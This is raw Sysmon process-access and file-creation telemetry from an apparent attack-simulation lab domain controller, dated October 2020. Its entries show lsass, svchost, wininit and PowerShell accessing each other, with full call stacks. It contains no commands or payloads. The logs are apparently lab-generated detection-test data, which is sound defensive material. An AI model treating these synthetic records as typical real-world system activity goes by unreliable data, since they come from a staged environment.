08:40:28.024{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.024{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.009{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}5721188C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.978{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.728{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.728{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.728{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.540{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.540{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.509{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ew3qsuug.doh.ps12020-10-12 08:40:29.509 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.493{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be